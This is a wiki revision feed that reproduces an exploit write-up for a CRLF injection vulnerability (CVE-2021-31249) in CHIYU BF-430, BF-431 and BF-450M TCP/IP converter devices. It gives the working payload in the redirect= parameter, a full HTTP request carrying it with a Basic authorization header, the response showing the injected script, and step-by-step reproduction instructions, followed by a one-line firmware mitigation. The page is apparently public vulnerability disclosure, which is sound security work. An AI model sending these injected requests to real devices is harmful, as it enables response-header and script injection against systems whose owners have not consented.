<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CHIYU_TCP%2FIP_Converter_devices_CLRF%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E</id>
	<title>CHIYU TCP/IP Converter devices CLRF注入漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CHIYU_TCP%2FIP_Converter_devices_CLRF%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CHIYU_TCP/IP_Converter_devices_CLRF%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-09T00:24:32Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CHIYU_TCP/IP_Converter_devices_CLRF%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;diff=3887&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: CHIYU TCP/IP Converter devices - CRLF injection # Date: May 31 2021 # Exploit Author: sirpedrotavares # Vendor Homepage: https://www.chiyu-tech....&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CHIYU_TCP/IP_Converter_devices_CLRF%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;diff=3887&amp;oldid=prev"/>
		<updated>2021-06-02T01:13:21Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; # Exploit Title: CHIYU TCP/IP Converter devices - CRLF injection # Date: May 31 2021 # Exploit Author: sirpedrotavares # Vendor Homepage: https://www.chiyu-tech....&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: CHIYU TCP/IP Converter devices - CRLF injection&lt;br /&gt;
# Date: May 31 2021&lt;br /&gt;
# Exploit Author: sirpedrotavares&lt;br /&gt;
# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html&lt;br /&gt;
# Software Link: https://www.chiyu-tech.com/category-hardware.html&lt;br /&gt;
# Version:  BF-430, BF-431, and BF-450M TCP/IP Converter devices   - all firmware versions &amp;lt; June 2021&lt;br /&gt;
# Tested on:  BF-430, BF-431, and BF-450M&lt;br /&gt;
# Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks&lt;br /&gt;
&lt;br /&gt;
Description: A CRLF injection vulnerability was found on BF-430, BF-431, and BF-450M TCP/IP Converter devices from CHIYU Technology Inc due to a lack of validation on the parameter redirect= available on multiple CGI components.&lt;br /&gt;
CVSS: Medium – CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N&lt;br /&gt;
URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31249&lt;br /&gt;
&lt;br /&gt;
Affected parameter: redirect=Component: all the CGI components&lt;br /&gt;
Payload: %0d%0a%0d%0a&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====HTTP request======&lt;br /&gt;
GET&lt;br /&gt;
/man.cgi?redirect=setting.htm%0d%0a%0d%0a&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;failure=fail.htm&amp;amp;type=dev_name_apply&amp;amp;http_block=0&amp;amp;TF_ip0=192&amp;amp;TF_ip1=168&amp;amp;TF_ip2=200&amp;amp;TF_ip3=200&amp;amp;TF_port=&amp;amp;TF_port=&amp;amp;B_mac_apply=APPLY&lt;br /&gt;
HTTP/1.1&lt;br /&gt;
Host: 192.168.187.12&lt;br /&gt;
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101&lt;br /&gt;
Firefox/68.0&lt;br /&gt;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8&lt;br /&gt;
Accept-Language: en-US,en;q=0.5&lt;br /&gt;
Accept-Encoding: gzip, deflate&lt;br /&gt;
Referer: http://192.168.187.12/manage.htm&lt;br /&gt;
Authorization: Basic OmFkbWlu&lt;br /&gt;
Connection: close&lt;br /&gt;
Upgrade-Insecure-Requests: 1&lt;br /&gt;
&lt;br /&gt;
======HTTP response========&lt;br /&gt;
HTTP/1.1 302 Found&lt;br /&gt;
Location: setting.htm&lt;br /&gt;
&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&lt;br /&gt;
Content-Length: 0&lt;br /&gt;
Content-Type: text/html&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Steps to reproduce:&lt;br /&gt;
  1. Navigate to the vulnerable device&lt;br /&gt;
  2. Make a GET request to all CGI components&lt;br /&gt;
  3. Append the payload at the end of the vulnerable parameter (redirect )&lt;br /&gt;
  4. Submit the request and observe payload execution&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 Mitigation: The latest version of the CHIYU firmware should be installed&lt;br /&gt;
to mitigate this vulnerability.&lt;br /&gt;
            &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>